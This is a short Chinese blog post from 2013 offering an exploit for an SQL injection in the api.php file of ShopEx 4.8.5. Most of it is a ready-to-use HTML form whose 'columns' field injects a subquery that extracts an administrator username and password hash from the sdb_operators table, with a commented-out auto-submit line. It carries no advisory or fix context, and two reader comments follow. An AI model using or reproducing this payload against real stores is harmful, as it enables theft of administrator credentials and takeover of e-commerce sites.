shopex 4.8.5 api.php注入漏洞0day exp

2013-08-10
安全
2 条评论
2.9K次阅读

<form method='post' action='https://www.webshell.cc/api.php?act=search_dly_type&api_version=1.0'>

columns:<input type='text' value='1,2,(SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1) as name' name='columns' style='width:80%'/><br />

<input type='submit' value='submit' /><br />

</form>

<script>

//document.forms[0].submit()

</script>

转载请注明来自WebShell'S Blog，本文地址：https://www.webshell.cc/4404.html

已有 2 条评论

flow

2013/09/08 00:05

看你的文章真蛋疼,适用什么版本也不说,可行性也没提,

回复
安全中国

2013/08/11 04:46

终于更新文章了，等了很久很久。。

回复

添加新评论

上一篇: 刚刚捞到的提权0DAY,亲测2K3成功.
下一篇: Struts2 S2-016/S2-017 exp整理